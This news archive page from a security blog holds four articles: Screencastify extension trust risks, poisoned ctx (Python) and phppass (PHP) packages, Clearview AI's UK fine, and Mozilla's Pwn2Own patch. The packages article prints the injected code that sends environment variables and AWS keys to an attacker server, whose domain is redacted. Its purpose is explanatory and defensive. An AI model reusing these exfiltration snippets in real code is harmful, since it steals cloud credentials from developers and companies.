Category Archives: News

Who’s watching your webcam? The Screencastify Chrome extension story…

We’ve often warned about the risks of browser extensions – not just for Chrome, but for any browser out there.

That’s because browser extensions aren’t subject to the same strict controls as the content of web pages you download, otherwise they wouldn’t be extensions

…they’d basically just be locally-cached web pages.

An ad-blocker or a password manager that was locked down so it worked on exactly one website wouldn’t be much use; a tab manager that could only manage one tab or site at a time wouldn’t be very helpful; and so on.

Web pages aren’t supposed to be able to override any controls imposed by the browser itself, so they can’t alter the address bar to display a bogus servername, or bypass the Are you sure? dialog that verifies you really did want to download that Word document to your hard disk.

Browser extensions, on the other hand, are supposed to be able, well, to extend and alter the behaviour of the browser itself.

Amongst other things, browser extensions can:

  • Peek at what is about to be shown in each tab after it’s been decrypted.
  • Modify what finally gets displayed.
  • See and tweak everything you type in or upload before it gets transmitted.
  • Read and write files on your local hard disk.
  • Launch or monitor other programs.
  • Access hardware such as webcams and microphones.

Screencastify is one example of a browser extension that provides a popular feature that wouldn’t be possible via a website alone, namely capturing some or all of your screen so you can share it with other users.

The extension boasts 10,000,000+ users (apparently, there is no higher category, no matter how many users you get to), and invites you, in its own description, to:

Security researcher Wladimir Palant, himself an extension developer, decided to look into Screencastify, given its popularity.

Earlier this week, he published what he found.

Amongst other things, his report is a well-written reminder of just how difficult it can be to work out who’s involved in the web of trust you need to have when you decide to use an app or service from company X.

Suppy chain risks revisited

Just like source-code supply chain risks, where you install software from A, which is licensed from B, updates from C, pulls in additional modules from D (possibly repeated recursively in many interconnected stages)…

…web-based service risks can come from an implicit delegation of trust to many other vendors or providers who are involved in the service delivery process.

Palant started by looking at Screencastify’s Chrome manifest file, a JSON data file that comes with every extension to specify important information such as name, version number, security policy, update URL, and permissions needed.

One of the entries in a Chrome manifest is a list called externally_connectable, which states which extensions, apps and websites are allowed to interact with your extension.

Typically, other extensions and apps already installed on your system can do this by default, but for obvious security reasons, external websites can’t.

This means that you can’t innocently wander onto a website, just to take a look around, only to find that the server you’re visiting is trying to take control of the extension unexpectedly.

But Screencastify provides all sort of additional cloud-based functionality from its own website, so it understandably included itself in the list of externally_connectable sources.

When Palant first looked, the connection trust list looked like this:

{ . . . "externally_connectable": { "matches": [ "https://*.screencastify.com/*" ] }, . . .
}

Givem that the special character * means “match anything here”, the specification above says that any URL on any website under the screencastify.com domain is automatically authorised to interact remotely with your browser, via the Screencastify extension…

…which, don’t forget, has access to your webcam to provide a popular aspect of its service.

Palant quickly found that one of the requests that that these externally_connectable websites could send to your browser was tagged bg:getSignInToken, and making this request returned a Google access token for your Google Drive files. (In our tests, Screencastify won’t work unless you have a Google account and are logged into it.)

Interestingly, according to Palant, the reason that Screencastify works with full access to Google Drive (extensions can, in fact, request access only to a directory of their own) is that without full access, an extension can’t display a list of its own files. So, to keep a stash of uploaded files that you can later browse through, it seems that an extension needs to go for full access, create a directory of its own, and then display its own files from there.

Additionally, as you would expect, given that Screencastify is all about screen capture with added webcam streaming, externally_connectable websites can request access to Chrome’s desktopCapture API (which can read in pixel content from anywhere on the screen), to the tabCapture API (which can extract content from inside the browser itself), and to the WebRTC API (short for web real-time communication, including webcam access).

Requests to capture your desktop or browser tabs are less controversial than they might sound, because they always produce an obvious popup dialog to request permission.

Apparently, Chrome asks every single time – there’s not even any inferred permission if you turn on screen capturing multiple times in a single session.

But webcam permisisons only need to be requested once, which Screencastify does when you set it up, after which they can be claimed without further popups appearing.

Palant also found that Screencastify’s default video recording settings, once some sort of capture is enabled, include uploading the video to your Google Drive files.

And, as we mentioned above, any website on the externally_connectable list can acquire an access token for your Google Drive and download the videos later on, even if it didn’t sneakily start an unwanted webcam capture itself.

So what?

At this point, you might be thinking, “So what? I’ve already decided to trust Screencastify’s code and website, so this is not a surprise. I’m already expecting Screencastiy to capture and store the video, so they’ll have it anyway.”

This is where the setting https://*.screencastify.com/* (see above) becomes significant.

As Palant discovered at the time of his research, at least six Screencastify subdomains were operated by third parties:

  • Webflow handled the www.screencastify.com subdomain,
  • Teachable handled course.screencastify.com,
  • Atlassian handled the subdomain status.screencastify.com,
  • Netlify handled quote.screencastify.com,
  • Marketo handled go.screencastify.com, and
  • ZenDesk handled learn.screencastify.com.
  • In other words, you not only needed to trust Screencastify’s extensions and its own servers with “silent” access to your webcam and your Google Drive, but also to trust at least all the other providers above.

    More specifically, you had to trust that there were no bugs such as cross-site scripting (XSS) flaws on any of those subdomains.

    An XSS bug means that you can trick a site such as example.com into generating and serving up a web page that includes unmodified, dangerous content of your own choosing, such as a search result that includes a raw snippet of JavaScript code instead of a simple text string.

    If you ask my website to search for Luap Nilkcud, and I return an HTML page that that includes, say, <bold>Luap Nilkcud</bold> not found, try again, that’s mostly harmless, because the generated HTML just means “print the given text in bold and the rest in a plain font”. But if you search for, say, <script>alert("Oops")</script>, and I reflect that text precisely, including the magic angle brackets, your browser will interpret and execute the code inside the script tags. (Those angle brackets should have been stripped out, or converted to the special codes &lt; and &gt; respectively). The “unescaped” script code will run with the same security powers as code stored on my own site, so you would effectively be able to inject JavaScript into my site’s served-up HTML without actually hacking my server.

    Ultimately, Palant did find an XSS bug on one of the Screencastify properties, which he reported back in February.

    To its credit, Screencastify acknowledged the bug on the very same day, and had it fixed by the next.

    Lots of moving parts

    This investigation is nevertheless a good reminder that there may be many more moving parts, and many more risk exposures, than you first think when you decide to go for product P or service S from vendor V.

    Interestingly, since Palant’s report came out, Screencastify decided to restrict that overly-broad trust list in its externally_connectable specification, which has now been reduced to an explicit set of subdomains:

{ . . . "externally_connectable": { "matches": [ "https://captions.screencastify.com/*", "https://edit.screencastify.com/*", "https://questions.screencastify.com/*", "https://watch.screencastify.com/*", "https://www.screencastify.com/*" ] }, . . .
}

The www.screencastify.com subdomain, operated by a third-party, is still there, but the explicit list makes it much easier for SecOps (security operations) researchers to quantify the overall risk of this extension if they are so inclined.

The least-privilege principle

It’s a great reminder of the value of the need-to-know, or least-privilege principle, which says that you shouldn’t give anyone access to resources they don’t need, no matter how much you trust them, on the grounds that there’s less to go wrong if you specify your security settings explicitly rather than implicitly.

Need-to-know also protects trusted users from making innocent mistakes that could be costly both for you and for them.

For example, sometimes you need to be logged in with root or Administrator powers…

…but you don’t need root to read your email or to browse the web, so you should set up your account so you can take on those superpowers only when needed, and relinquish them when you don’t.

Less, in cybersecurity, is very often more.


Poisoned Python and PHP packages purloin passwords for AWS access

A keen-eyed researcher at SANS recently wrote about a new and rather specific sort of supply chain attack against open-source software modules in Python and PHP.

Following on-line discussions about a suspicious public Python module, Yee Ching Tok noted that a package called ctx in the popular PyPi repository had suddenly received an “update”, despite not otherwise being touched since late 2014.

In theory, of course, there’s nothing wrong with old packages suddenly coming back to life.

Sometimes, developers return to old projects when a lull in their regular schedule (or a guilt-provoking email from a long-standing user) finally gives them the impetus to apply some long-overdue bug fixes.

In other cases, new maintainers step up in good faith to revive “abandonware” projects.

But packages can become victims of secretive takeovers, where the password to the relevant account is hacked, stolen, reset or otherwise compromised, so that the package becomes a beachhead for a new wave of supply chain attacks.

Simply put, some package “revivals” are conducted entirely in bad faith, to give cybercriminals a vehicle for pushing out malware under the guise of “security updates” or “feature improvements”.

The attackers aren’t necessarily targeting any specific users of the package they compromise – often, they’re simply watching and waiting to see if anyone falls for their package bait-and-switch…

…at which point they have a way to target the users or companies that do.

New code, old version number

In this attack, Yee Ching Tok noticed that altough the package suddenly got updated, its version number didn’t change, presumably in the hope that some people might [a] take the new version anyway, perhaps even automatically, but [b] not bother to look for differences in the code.

But a diff (short for difference, where only new, changed or deleted lines in the code are examined) showed added lines of Python code like this:

 if environ.get('AWS_ACCESS_KEY_ID') is not None: self.secret = environ.get('AWS_ACCESS_KEY_ID')

You may remember, from the infamous Log4Shell bug, that so-called environment variables, accessible via os.environ in Python, are memory-only key=value settings associated with a specific running program.

Data that’s presented to a program via a memory block doesn’t need to be written to disk, so this is a handy way of passing across secret data such as encryption keys while guarding against saving the data improperly by mistake.

However, if you can poison a running program, which will already have access to the memory-only process environment, you can read out the secrets for yourself and steal the, for example by sending them out buried in regular-looking network traffic.

If you leave the bulk of the source code you’re poisoning untouched, its usual functions will still work as before, and so the malevolent tweaks in the package are likely to go unnoticed.

Why now?

Apparently, the reason this package was attacked only recently is that the server name used for email by the original maintainer had just expired.

The attackers were therefore able to buy up the now-unused domain name, set up an email server of their own, and reset the password on the account.

Interestingly, the poisoned ctx package was soon updated twice more, with more added “secret sauce” squirrelled away in the infected code, this time including more aggressive data-stealing code.

The requests.get() line below connects to an external server controlled by the crooks, though we have redacted the domain name here:

 def sendRequest(self): str = "" for _, v in environ.items(): str += v + " " ### --encode string into base64 resp = requests.get("https://[REDACTED]/hacked/" + str)

The redacted exfiltration server will receive the encoded environment variables (including any stolen data such as access keys) as an innocent-looking string of random-looking data at the end of the URL.

The response that comes back doesn’t actually matter, because it’s the outgoing request, complete with appended secret data, that the attackers are after.

If you want to try this for yourself, you can create a standalone Python program based on the pseudocode above, such as this::

Then start a listening HTTP pseudoserver in a separate window (we used the excellent ncat utility from the Nmap toolkit, as seen below), and run the Python code.

Here, we’re in the Bash shell, and we have used env -i to strip down the environment variables to save space, and we’ve run the Python exfiltration script with a fake AWS environment variable set (the access key we chose is one of Amazon’s own deliberately non-functional examples used for documentation):

The listening server (you need to start this first so the Python code has something to connect to) will answer the request and dump the data that was sent:

The GET /... line above captures the encoded data that was exfiltrated in the URL.

We can now decode the base64 data from the GET request and reveal the fake AWS key that we added to the process environment in the other window:

Related criminality

Intrigued, Yee Ching Tok went looking elsewhere for the exfiltration servername that we redacted above.

Surprise, surprise!

The same server turned up in code recently uploaded to a PHP project on GitHub, presumably because it just happened to be compromised by the same attackers at around the same time.

That project is what used to be a legitimate PHP hashing toolkit called phppass, but it now contains these three lines of unwanted and dangerous code:

 $access = getenv('AWS_ACCESS_KEY_ID'); $secret = getenv('AWS_SECRET_ACCESS_KEY'); $xml = file_get_contents("http://[REDACTED]hacked/$access/$secret");

Here, any Amazon Web Services access secrets, which are pseudorandom character strings, are extracted from environment memory (getenv() above is PHP’s equivalent of os.environ.get() in the rogue Python code you saw before) and fashioned into a URL.

This time, the crooks have used http instead of https, thus not only stealing your secret data for themselves, but also making the connection without encryption, thus exposing your AWS secrets to anyone logging your traffic as it traverses the internet.

What to do?

  • Don’t blindly accept open-source package updates when they show up. Go through the code differences yourself before you decide that the update is in your interest. Yes, determined criminals will typically hide their illegal code changes more subtly than the hacks you see above, so it might not be as easy to spot. But if you don’t look at all, then the crooks can get away with anything they want.
  • Check for suspicious changes in any maintainer’s account before trusting it. Look at the documentation in the previous version of the code (presumably, code that you already have) for the contact details of the previous maintainer, and see what’s changed on the account since the last update. In particular, if you can see domain names that expired and were only re-registered recently, or email changes that introduce new maintainers with no obvious previous interest in the project, be suspicious.
  • Don’t rely only on module tests that verify correct behaviour. Aim for generic tests that look for unwanted, unusual and unexpected behaviour as well, especially if that behaviour has no obvious connection to the package you’ve changed. For example, a utility to compute password hashes shouldn’t make network connections, so if you catch it doing so (using test data rather than live information, of course!) then you should suspect foul play.

Threat detection tools such as Sophos XDR (the letters XDR are industry jargon for extended detection and response) can help here by allowing you to keep your eye on programs you’re testing, and then to review their activity record for types of behaviour that shouldn’t be there.

After all, if you know what your software is supposed to do, you should also know what it’s not supposed to do!


Clearview AI face-matching service fined a lot less than expected

Face-matching service Clearview AI has only been around for five years, but it has courted plenty of controversy in that time, both inside and outside the courtroom.

Indeed, we’ve written about the Clearview AI many times since the start of 2020, when a class action suit was brought against the company in the US state of Illinois, which has some of the country’s strictest data protection laws for biometric data:

As the court documents alleged at the time:

Without obtaining any consent and without notice, Defendant Clearview used the internet to covertly gather information on millions of American citizens, collecting approximately three billion pictures of them, without any reason to suspect any of them of having done anything wrong, ever.

[…A]lmost none of the citizens in the database has ever been arrested, much less been convicted. Yet these criminal investigatory records are being maintained on them, and provide government almost instantaneous access to almost every aspect of their digital lives.

The class action went on to claim that:

Clearview created its database by violating each person’s privacy rights, oftentimes stealing their pictures from websites in a process called “scraping,” which violate many platforms’ and sites’ terms of service, and in other ways contrary to the sites’ rules and contractual requirements.

Cease and desist

Indeed, the company quickly faced demands from Facebook, Twitter and YouTube to stop using images from their services, with the search and social media giants all singing from the same songbook with words to the effect of, “Our terms and conditions say ‘no scraping’, and that’s exactly we mean”:

Clearview AI’s founder and CEO Hoan Ton-That was unimpressed, hitting back with a claim that America’s free-speech laws gave him the right to access what he called “public information”, noting, “Google can pull in information from all different websites. If it’s public […] and it can be inside Google’s search engine, it can be in ours as well.”

Of course, anyone who thinks that the internet should operate on a strictly opt-in basis would argue that two wrongs don’t make a right, and the fact that Google has collected the data already doesn’t justify someone scraping it again from Google, especially not for the purposes of automated and indiscriminate face-matching by unspecified customers, and in defiance of Google’s own terms and conditions.

And even the most vocal opt-in-only advocate will probably admit that an opt-out mechanism is better than no protection at all, provided that the process actually works.

Whatever you think of Google, for instance, the company does honour “do not index” requests from website operators, such as a robots.txt file in the root directory of your webserver, or an HTTP header X-Robots-Tag: noindex in your web replies.

YouTube hit back unequivocally, saying:

YouTube’s Terms of Service explicitly forbid collecting data that can be used to identify a person. Clearview has publicly admitted to doing exactly that, and in response we sent them a cease and desist letter.

More trouble at the image-processing mill

Not long after the social media scraping brouhaha, Clearview AI suffered a widely-publicised data breach.

Although it insisted that it’s servers “were never accessed”, it simultaneously admitted that hackers had indeed made off with a slew of customer data, including how many searches each customer had performed.

Later in 2020, on top of the class action in Illinois, Clearview AI was sued by the Americam Civil Liberties Union (ACLU).

And in 2021, the company was jointly investigated by the the privacy regulators of the UK and Australia, the ICO and the OAIC respectively. (Those initialisms are short for Information Commissioner’s Office and Office of the Australian Information Commisioner.)

As we explained at the time, the ICO concluded that Clearview:

  • Had no lawful reason for collecting the information in the first place;
  • Did not process information in a way that people were likely to expect;
  • Had no process to to stop the data being retained indefinitely;
  • Did not meet the “higher data protection standards” required for biometric data;
  • Did not tell anyone what was happening to their data.

Loosely speaking, both the OAIC and the ICO concluded that an individual’s right to privacy trumped any consideration of “fair use” or “free speech”, and both regulators explicity denounced Clearview’s data collection as unlawful.

The ICO, indeed, announced that it planned to fine Clearview AI more than £17m [then about £20m].

What happened next?

Well, as the ICO told us in a press release that we received this morning, its proposed fine has now been imposed.

Except that instead of being “over £17 million“, as stated in the ICO’s provisional assessment, Clearview AI has got away with a fine of well under half that amount.

As the press release explained:

The Information Commissioner’s Office (ICO) has fined Clearview AI Inc £7,552,800 [now about $9.5m] for using images of people in the UK, and elsewhere, that were collected from the web and social media to create a global online database that could be used for facial recognition.

The ICO has also issued an enforcement notice, ordering the company to stop obtaining and using the personal data of UK residents that is publicly available on the internet, and to delete the data of UK residents from its systems.

Simply put, the company has eventually been punished, but apparently with less that 45% of the financial vigour that was originally proposed.

What to do?

Clearview AI has now explicitly fallen foul of the law in the UK, and will no longer be allowed to scrape images of UK residents at all (though how this will be policed, let alone enforced, is unclear).

The problem, sadly, is that even if the vast majority of countries follow suit and order Clearview AI to stay away, those legalisms won’t actively stop your photos getting scraped, in just the same way that laws criminalising the use of malware almost everywhere in the world haven’t put an end to malware attacks.

So, as we’ve said before when it comes to image privacy, we need to ask not merely what our country can do for us, but also what we can do for ourselves:

  • If in doubt, don’t give it out. By all means publish photos of yourself, but be thoughtful and sparing about quite how much you give away about yourself and your lifestyle when you do. Assume they will get scraped whatever the law says. and assmue someone will try to misuse that data if they can.
  • Don’t upload data about your friends without permission. It feels a bit boring, but it’s the right thing to do. Ask everyone in the photo if they mind you uploading it, ideally before you even take it. Even if you’re legally in the right to upload the photo because you took it, respect others’ privacy as you hope they’ll respect yours.

Let’s aim for a truly opt-in online future, where nothing to do with privacy is taken for granted, and every picture that’s uploaded has the consent of everyone in it.


Mozilla patches Wednesday’s Pwn2Own double-exploit… on Friday!

Just a short note to let you know that we were wrong about Firefox and Pwn2Own in our latest podcast…

…but we were right about how Mozilla would react in our latest podcast promotional video:

In the video, we said (our own emphasis below):

In the podcast, we speculated, “Was this [recent Firefox fix] pushed out just in time for Pwn2Own, in the hope that it would prevent the attack working?” If that was the reason, it didn’t work. […] But we do know that Mozilla will be rushing to fix this one as soon as they get the details out of the Pwn2Own competition.

To explain.

In an article last weekend, after our Linux distro had received an apparently-hurried out-of-band Firefox patch but the update still hadn’t shown on on Firefox’s website, we found ourselves wondering, “Is there some kind of cybersecurity scramble on here?”

This update added a sandbox security feature known as Win32k Lockdown that had been months, if not years, in the making, but had just missed schedlued release 100.0.

Accordingly, we speculated that Firefox 100.0.1, a mere point-release in which a brand new Windows security feature had suddenly been activated, was wrangled out specially, just in time for this year’s Pwn2Own hacking competition in Vancouver, Canada.

Why not wait?

We were surprised that Mozilla didn’t simply wait until the next scheduled release, 101.0, to turn the new feature on and announce it as a feature, rather than as a “security fix”, givem that it wasn’t there to stop a clear and specific attack that was already known.

Usually, point releases come out to deal with urgent issues that genuinely can’t wait, such as new features that flop, or zero-day bugs that suddenly show up in the wild and need dealing with before the next four-weekly major update deadline rolls around.

But with Pwn2Own taking place this very week, and with Firefox in the firing line from experienced and successful bug hunter Manfred Paul, maybe Mozilla figured that it was worth squeezing out 100.0.1 in time for the contest?

Just in case the new sandbox feature might throw an unexpected spanner into Paul’s otherwise-certain-to-succeed hacking session, and save the day?

On Wednesday, Paul’s session started with 30’00” on the clock, counting downwards (a hard upper bound of 30 minutes is imposed for each entrant).

After a brief pause, the adjudicator reached out and clicked a button to initiate the hacking attempt by visting a URL that was ready to unleash Paul’s double-exploit remotely. (The server was remote in network terms; physically it was on the same table as the client under attack.)

Loosely speaking, Paul planned to break into Firefox, earning $50,000 in bug bounty for remote code execution, and then to break back out of it, earning another $50,000 for a full sandbox escape.

About seven elapsed seconds later, with a fist pump of acknowledgment from the adjudicator (Pwn2Own is exciting for everyone, not just the hackers), and with an unsurprisingly happy smile from Manfred Paul, now $100,000 better off, the clock stopped, having just flipped over to show 29’52”.

If Win32k Lockdown was supposed to stop the Pwn2Own attack, it didn’t, although we don’t doubt that the new sandbox protection will make plenty of future exploits harder to find and less reliable to use.

To claim a Pwn2Own prize, the deal is that you have to “show your working”, in complete explanatory detail, to the maker of the system you just cracked, and give them first dibs at fixing it.

All proper bug bounties work this way, of course, but Pwn2Own isn’t just about spotting possible bugs and calling them in with a crash log, it’s about researching and writing up the bug and its dangers with careful and repeatable details, up to and including a working exploit.

Well done to everyone involved

Well, that seven-second spectacular pwnage happened on Wednesday 2022-05-18.

And on Friday 2022-05-20, about an hour before midnight UK time, Firefox popped up to tell us, “An update is available to 100.0.2”.

Here are the associated security notes, from Mozilla Security Advisory 2022-19:

* CVE-2022-1802: Prototype pollution in Top-Level Await implementation. Reporter: Manfred Paul via Trend Micro's Zero Day Initiative Impact: Critical Description: If an attacker was able to corrupt the methods of an Array object in JavaScript via prototype pollution, they could have achieved execution of attacker-controlled JavaScript code in a privileged context. * CVE-2022-1529: Untrusted input used in JavaScript object indexing, leading to prototype pollution. Reporter: Manfred Paul via Trend Micro's Zero Day Initiative Impact: Critical Description: An attacker could have sent a message to the parent process where the contents were used to double-index into a JavaScript object, leading to prototype pollution and ultimately attacker-controlled JavaScript executing in the privileged parent process.

What to do?

We’ve patched already – how about you?

For the fourth time in the past week, we’re going to say: Patch early, patch often.

With a response time like this, it would be rude not to!

Oh, and a vey big “well done and thanks” to everyone at every stage of this bug finding-and-fixing process.


go top